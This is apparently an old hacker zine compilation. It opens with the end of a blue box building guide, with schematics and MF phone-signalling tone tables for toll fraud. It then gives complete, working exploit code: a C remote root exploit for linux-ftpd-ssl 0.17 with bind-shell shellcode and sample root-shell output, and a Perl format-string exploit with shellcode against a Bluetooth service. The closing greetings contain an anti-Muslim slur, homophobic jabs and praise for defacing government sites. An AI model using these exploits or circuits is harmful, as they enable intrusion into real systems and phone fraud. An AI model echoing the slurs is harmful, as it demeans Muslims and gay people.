| | | | |
-------+--+--+--+------------------+-----------------
| 23 22 21 20 24 18+-+
+-----+12 | +--+
| | (*74LS154*) 19+-+ _|_
_|_ | | X_/
X_/GND | 1 2 3 4 5 6 7 8 9 10 11 13 14 15 16 17 | GND
+--+--+--+--+--+--+--+--+--+-+--+--+--+--+--+--+----+
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| | | | | | | | | | | | | | | |
| (Connects)
| +---------->
+------------------------+ | (Figure 2)
| +--+ +-------+
| | | |
+--+-------+--+-------+---+
| 3--|>o--4 5--|>o--6 |
| (Invtr.) (Invtr.) |
+---------------+7 |
_|_ | (*74C04*) |
GNDX_/ (VCC) [+]--+14 |
(+5 volts) | |
+-------------------------+
+-------------+ _
| Figure #2 | / |
+---+-------------+----+ +----------------+ |
| Tone Generation Side | _|_ | | SPKR
+----------------------+ GNDX_/ +---+--+---+ |
| | X_|
| |
| | +---------------+
+-------+ | | | |
| _|_ | +--+14 |
| X_/GND | | (Repeat of) |
| | | (First) |
----- (.1C) | | (Circuit) |
----- | | |
| | | (*XR2207CP*) |
| +-----------------+ | +--+6 |
| | | | | | |
[+]-----+-------+1 14+--+ | +---------------+
(VCC) | | +--------------------+
(+9 Volts) +----+2 | |
| | 12+---------------------+ |
(.01C) ----- | | _|_ |
----- | (*XR2207CP*) | X_/GND |
| | | 1.5K Ohms |
+----+3 11+---+---X/XRx/X/---+--+ |
| | | | _|_ |
| | +---X/XRx/X/---+ X_/GND |
| | 1.0K Ohms |
| 10+----+ |
+-------------+6 9+----+---+ |
| | 8+----+ | |
| | | ----- (.1C) |
| +-----------------+ ----- |
+---------+ _|_ +----------+
| | Pot. GNDX_/ Pot. | |
| X/X/X/X/--+-----------------------X/X/X/X/ |
| 1400 Hz. | 1600 Hz. |
+---------+ | +----------+
| | Pot. | Pot. | |
| X/X/X/X/--+----------------+------X/X/X/X/ |
| 1500 Hz. | | 900 Hz. |
| | | |
| 14 more | | 14 More |
| Potentiometers | | Potentiometers |
| in this | | in this |
| area left out | | area left out |
| for simplicity | | for simplicity |
| | | |
| | | |
|
(Connects) |
<-------------+
(Figure 1)
+-------------------------+
| Multiplex Keypad System |
+-------------------------+
First, the multiplex pattern used in the 4x4 keypad layout. I suggest that
keys 0-9 be used as the Blue Box's 0-9 keys, and then you can assign A-D, *, #
keys to your comfort (ie. * = Kp, # = St, D = 2600, and A-C as Kp1, Kp2 or
however you want).
Note: On your 2600 Hz. key (The D key in example above)
it may be a good idea to tune in a second
potentiometer to 3700 Hz. (Pink Noise).
Keypad Key Assignments Multiplex Pattern
+---------+ +-------------+ +------------+
| 1 2 3 A | | 1 2 3 4 | | 1 2 3 A |----Y1=8 X1=3
| 4 5 6 B | | 5 6 7 8 | | 4 5 6 B |----Y2=1 X2=5
| 7 8 9 C | | 9 10 11 12 | | 7 8 9 C |----Y3=2 X3=6
| * 0 # D | | 13 14 15 16 | | * 0 # D |----Y4=4 X4=7
+---------+ +-------------+ +------------+
| | | |
X1 X2 X3 X4
+----------------------+
| Blue Box Frequencies |
+----------------------+
This section is taken directly from Mark Tabas's "Better Homes and Blue
Boxing" file Part 1.
Frequenies (Hz) Domestic Int'l
----------------------------------
700+900 1 1
700+1100 2 2
900+1100 3 3
700+1300 4 4
900+1300 5 5
1100+1300 6 6
700+1500 7 7
900+1500 8 8
1100+1500 9 9
1300+1500 0 0
700+1700 ST3p Code 11
900+1700 STp Code 12
1100+1700 KP KP1
1300+1700 ST2p KP2
1500+1700 ST ST
2600+3700 *Trunking Frequency*
Note: For any further information about the uses or duration of the
frequencies, read the Mark Tabas files.
+----------------+
| Schematic Help |
+----------------+
This is the Key to the diagrams in the schematic. I hope that they help
more then they might hurt.
_|_
X_/GND is the Ground symbol
| |
---| |-- is the Capacitor symbol
| | (.1C) stands for a .1 uf Capacitor
(.01C) stands for a .01 uf Capacitor
|
-----
----- is another Capacitor symbol
|
--X/XRx/X/-- is the Resistor symbol (The 1.5K Ohm and 1.0K Ohm
Resistors are at +/- 5% )
---+
|
X/X/X/X/-- is the Potentiometer symbol (The frequncies I supplied
above are just examples.)
--|>o-- is the Inverter symbol
+------------+
| Conclusion |
+------------+
This is just one way to build a Blue Box. If you choose this way, then I
hope this file is adequate enough to aid you in the construction. Although
these are not the best plans, they do work. This file does not tell you how to
use it or what to do once it's built. For that information I mention that you
read Mark Tabas's "Better Homes and Blue Boxing" files, or any other files/BBS
subboards that deal with that realm.
If you need help, I sluggest (thanks for that one Taran) that you ask a
close friend, possibly an electronics teacher, or a phreak friend to help you.
Also, if you need help or have questions or comments about this file, you can
address them to me. I can be contacted through the LOD/H Technical Journal
Staff account on the boards listed in the Intro, or on the few boards I call.
+-------------+
! Credentials !
+-------------+
At last, this article would not be possible without the help of the
following people/places whom contributed to it in one way or another (it may
not be apparent to them, but every minute bit helps).
Deserted Surfer (Who helped immensly from Day 1 of this project.)
(Without his help this file would not be.)
Mark Tabas (For the BHBB files which inspired my interests.)
Nickie Halflinger (For the original Blue Box plans I used.)
Mr. America (For the original Blue Box plans I used.)
Lex Luthor
Cheap Shades
Exar Corp.
Lastly, I would like to thank the United States government for furnishing
federal grants to this project. Without their financial help, I would have had
to dish out the money from my own pocket (Approximately $80.00. Egads!)
************************************************************************************
linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit
-by dumb0
/*
connecting to 192.168.2.9:21... ok.
OK - STARTING ATTACK
+++ USING STACK ADDRESS 0xbfffcc03 +++
+++ USING STACK ADDRESS 0xbfffcc13 +++
+++ USING STACK ADDRESS 0xbfffcc23 +++
+++ USING STACK ADDRESS 0xbfffcc33 +++
+++ USING STACK ADDRESS 0xbfffcc43 +++
+++ USING STACK ADDRESS 0xbfffcc53 +++
+++ USING STACK ADDRESS 0xbfffcc63 +++
+++ USING STACK ADDRESS 0xbfffcc73 +++
+++ USING STACK ADDRESS 0xbfffcc83 +++
+++ USING STACK ADDRESS 0xbfffcc93 +++
+++ USING STACK ADDRESS 0xbfffcca3 +++
+++ USING STACK ADDRESS 0xbfffccb3 +++
+++ USING STACK ADDRESS 0xbfffccc3 +++
+++ USING STACK ADDRESS 0xbfffccd3 +++
+++ USING STACK ADDRESS 0xbfffcce3 +++
+++ USING STACK ADDRESS 0xbfffccf3 +++
+++ USING STACK ADDRESS 0xbfffcd03 +++
+++ USING STACK ADDRESS 0xbfffcd13 +++
+++ USING STACK ADDRESS 0xbfffcd23 +++
+++ USING STACK ADDRESS 0xbfffcd33 +++
+++ USING STACK ADDRESS 0xbfffcd43 +++
+++ USING STACK ADDRESS 0xbfffcd53 +++
+++ USING STACK ADDRESS 0xbfffcd63 +++
+++ USING STACK ADDRESS 0xbfffcd73 +++
+++ USING STACK ADDRESS 0xbfffcd83 +++
+++ USING STACK ADDRESS 0xbfffcd93 +++
+++ USING STACK ADDRESS 0xbfffcda3 +++
+++ USING STACK ADDRESS 0xbfffcdb3 +++
+++ USING STACK ADDRESS 0xbfffcdc3 +++
+++ USING STACK ADDRESS 0xbfffcdd3 +++
+++ USING STACK ADDRESS 0xbfffcde3 +++
+++ USING STACK ADDRESS 0xbfffcdf3 +++
+++ USING STACK ADDRESS 0xbfffce03 +++
+++ USING STACK ADDRESS 0xbfffce13 +++
+++ USING STACK ADDRESS 0xbfffce23 +++
+++ USING STACK ADDRESS 0xbfffce33 +++
+++ USING STACK ADDRESS 0xbfffce43 +++
+++ USING STACK ADDRESS 0xbfffce53 +++
+++ USING STACK ADDRESS 0xbfffce63 +++
+++ USING STACK ADDRESS 0xbfffce73 +++
+++ USING STACK ADDRESS 0xbfffce83 +++
+++ USING STACK ADDRESS 0xbfffce93 +++
+++ USING STACK ADDRESS 0xbfffcea3 +++
+++ USING STACK ADDRESS 0xbfffceb3 +++
+++ USING STACK ADDRESS 0xbfffcec3 +++
id
uid=0(root) gid=0(root) egid=1000(dumb0) groups=1000(dumb0),20(dialout),24(cdrom
),25(floppy),29(audio),44(video),46(plugdev)
uname -a
Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
// Tested on Linux 2.4.18-14 Redhat 8.0
// Linux 2.2.20-idepci Debian GNU 3.0
// Linux 2.4.27-2-386 Debian GNU 3.1
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>
#define BUF_SIZ 4096
#define PORT 21
#define BINDPORT 30464
#define STACK_START 0xbfffcc03
#define STACK_END 0xbffff4f0
/*my shellcode*/
/*setreuid,chroot break,
bind to port 30464, 0xff is double*/
unsigned char lnx_bind[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x70\x31\xC0\x31\xDB\x31\xC9"
"\xB0\x46\xCD\x80\x5E\x90\xB8\xBE"
"\xff\xff\xff\xff\xff\xff\xF7\xD0"
"\x89\x06\xB0\x27\x8D\x1E\xFE\xC5"
"\xB1\xED\xCD\x80\x31\xC0\x8D\x1E"
"\xB0\x3D\xCD\x80\x66\xB9\xff\xff"
"\x03\xBB\xD2\xD1\xD0\xff\xff\xF7"
"\xDB\x89\x1E\x8D\x1E\xB0\x0C\xCD"
"\x80\xE2\xEF\xB8\xD1\xff\xff\xff"
"\xff\xff\xff\xF7\xD0\x89\x06\xB0"
"\x3D\x8D\x1E\xCD\x80\x31\xC0\x31"
"\xDB\x89\xF1\xB0\x02\x89\x06\xB0"
"\x01\x89\x46\x04\xB0\x06\x89\x46"
"\x08\xB0\x66\x43\xCD\x80\x89\xF1"
"\x89\x06\xB0\x02\x66\x89\x46\x0C"
"\xEB\x04\xEB\x74\xEB\x77\xB0\x77"
"\x66\x89\x46\x0E\x8D\x46\x0C\x89"
"\x46\x04\x31\xC0\x89\x46\x10\xB0"
"\x10\x89\x46\x08\xB0\x66\x43\xCD"
"\x80\xB0\x01\x89\x46\x04\xB0\x66"
"\xB3\x04\xCD\x80\x31\xC0\x89\x46"
"\x04\x89\x46\x08\xB0\x66\xB3\x05"
"\xCD\x80\x88\xC3\xB0\x3F\x31\xC9"
"\xCD\x80\xB0\x3F\xB1\x01\xCD\x80"
"\xB0\x3F\xB1\x02\xCD\x80\xB8\xD0"
"\x9D\x96\x91\xF7\xD0\x89\x06\xB8"
"\xD0\x8C\x97\xD0\xF7\xD0\x89\x46"
"\x04\x31\xC0\x88\x46\x07\x89\x76"
"\x08\x89\x46\x0C\xB0\x0B\x89\xF3"
"\x8D\x4E\x08\x8D\x56\x0C\xCD\x80"
"\xE8\x15\xff\xff\xff\xff\xff\xff";
long ficken() {
printf("lnxFTPDssl_warez.c\nlinux-ftpd-ssl 0.17 remote r00t exploit by dumb0\n\n");
return 0xc0debabe;
}
void usage(char **argv) {
printf("Insufficient parameters given.\n");
printf("Usage: %s <remotehost> <user> <pass> [writeable directory]\n", argv[0]);
exit(0);
}
void _recv(int sock, char *buf) {
int bytes=recv(sock, buf, BUFSIZ, 0);
if (bytes < 0) {
perror("read() failed");
exit(1);
}
}
void attack(int sock, unsigned long ret, char *pad) {
int i,k;
char *x=(char*)malloc(1024);
char *bufm=(char*)malloc(1024);
char *bufc=(char*)malloc(1024);
char *rbuf=(char*)malloc(BUFSIZ+10);
char *nops=(char*)malloc(1024);
unsigned char a,b,c,d;
memset(nops,0,1024);
memset(nops,0x90,255);
memset(x,0,1024);
for (i=0,k=0;i<60;i++) {
a=(ret >> 24) & 0xff;
b=(ret >> 16) & 0xff;
c=(ret >> 8) & 0xff;
d=(ret) & 0xff;
if (d==255) {
x[k]=d;
x[++k]=255;
} else {
x[k]=d;
}
if (c==255) {
x[k+1]=c;
x[++k+1]=255;
} else {
x[k+1]=c;
}
if (b==255) {
x[k+2]=b;
x[++k+2]=255;
} else {
x[k+2]=b;
}
if (a==255) {
x[k+3]=a;
x[++k+3]=255;
} else {
x[k+3]=a;
}
k+=4;
}
snprintf(bufm, 1000, "MKD %s%s\r\n", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1
snprintf(bufc, 1000, "CWD %s%s\r\n", pad, x);
for (i=0; i<11; i++) {
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}
for (i=0; i<2; i++) {
snprintf(bufm, 1000, "MKD %s\r\n", lnx_bind);
snprintf(bufc, 1000, "CWD %s\r\n", lnx_bind);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
snprintf(bufm, 1000, "MKD %s\r\n", nops);
snprintf(bufc, 1000, "CWD %s\r\n", nops);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}
send(sock, "XPWD\r\n", strlen("XPWD\r\n"), 0);
free(bufm);
free(bufc);
free(x);
free(rbuf);
}
int do_remote_shell(int sockfd)
{
while(1)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sockfd,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
{
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds))
{
if((cnt=read(0,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(sockfd,buf,cnt);
}
if(FD_ISSET(sockfd,&fds))
{
if((cnt=read(sockfd,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(1,buf,cnt);
}
}
}
}
int do_connect (char *remotehost, int port) {
struct hostent *host;
struct sockaddr_in addr;
int s;
if (!inet_aton(remotehost, &addr.sin_addr))
{
host = gethostbyname(remotehost);
if (!host)
{
perror("gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
if (port == PORT) perror("connect() failed");
return -1;
}
return s;
}
void do_login(int s, char *buf, char *sendbuf, char *user, char *pass) {
memset(buf, 0, sizeof(buf));
memset(sendbuf, 0, sizeof(sendbuf));
do {
_recv(s, buf);
} while (strstr(buf, "220 ") == NULL);
snprintf(sendbuf, BUFSIZ, "USER %s\r\n", user);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "331 ") == NULL);
snprintf(sendbuf, BUFSIZ, "PASS %s\r\n", pass);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "230 ") == NULL);
}
int main(int argc, char **argv) {
char remotehost[255];
char user[255];
char pass[255];
char pad[10];
char *buf,*sendbuf;
int stackaddr=STACK_START;
int s,sr00t,i;
ficken();
if (argc < 4)
usage(argv);
strncpy(remotehost, argv[1], sizeof(remotehost));
remotehost[sizeof(remotehost)-1]=0;
strncpy(user, argv[2], sizeof(user));
user[sizeof(user)-1]=0;
strncpy(pass, argv[3], sizeof(pass));
pass[sizeof(pass)-1]=0;
printf("connecting to %s:%d...", remotehost, PORT);
fflush(stdout);
s=do_connect(remotehost, PORT);
puts(" ok.");
buf=(char*)malloc(BUFSIZ+10);
sendbuf=(char*)malloc(BUFSIZ+10);
do_login(s, buf, sendbuf, user, pass);
if (strstr(buf, "230")!=NULL) {
printf("OK - STARTING ATTACK\n");
i=0;
while (stackaddr <= STACK_END) {
printf("+++ USING STACK ADDRESS 0x%.08x +++\n", stackaddr);
sleep(1);
if (i==1) {
strcpy(pad, "A");
}
if (i==2) {
strcpy(pad, "AA");
}
if (i==3) {
strcpy(pad, "AAA");
i=0;
}
attack(s, stackaddr, pad);
close(s);
s=do_connect(remotehost, PORT);
do_login(s, buf, sendbuf, user, pass);
if (argv[4] != NULL) {
snprintf(sendbuf, BUFSIZ, "CWD %s\r\n", argv[4]);
send(s, sendbuf, strlen(sendbuf), 0);
recv(s, buf, BUFSIZ, 0);
}
if((sr00t=do_connect(remotehost, BINDPORT)) > 0) {
/* XXX Remote r00t */
printf("\nLet's get ready to rumble!\n");
do_remote_shell(sr00t);
exit(0);
}
stackaddr+=16;
i++;
}
} else {
printf("\nLogin incorrect\n");
exit(1);
}
free(buf);
free(sendbuf);
return 0;
}
**********************************************************************************************
#!/usr/bin/perl
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.cdej.org
$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents.
# R_386_JUMP_SLOT exit()
$addy = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";
$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;
$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;
#print "hi: $hi\n";
#print "lo: $lo\n";
$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";
$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";
open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);
system($string);
*******************************************************************************************************
On the behalf on the elite CDEJ staff i'd like to thank the following figures for
making this possible:
Longarm: our beloved monkey chief <:D>
trans: 5 stars general trans :D? highest member in ranking so far :D? you outdone yourself again
little brother, :.)
hunt3rx: mysterious spy/fed :? brought us l0lz n ports when the CDEJ staff was out on field trips in
m*slim (spit) territories, and our usual gay day jobs. Thank you hunt3rx
_Padre_ : recounced .gov defacer with pure moral intentions: lebx0r is gay ditch it!
migzy: channel operator who actively brought undernet infestors onto efnet. thank you for ruining
what is left of a decent IRC >:D<
*******************************************************************************************************
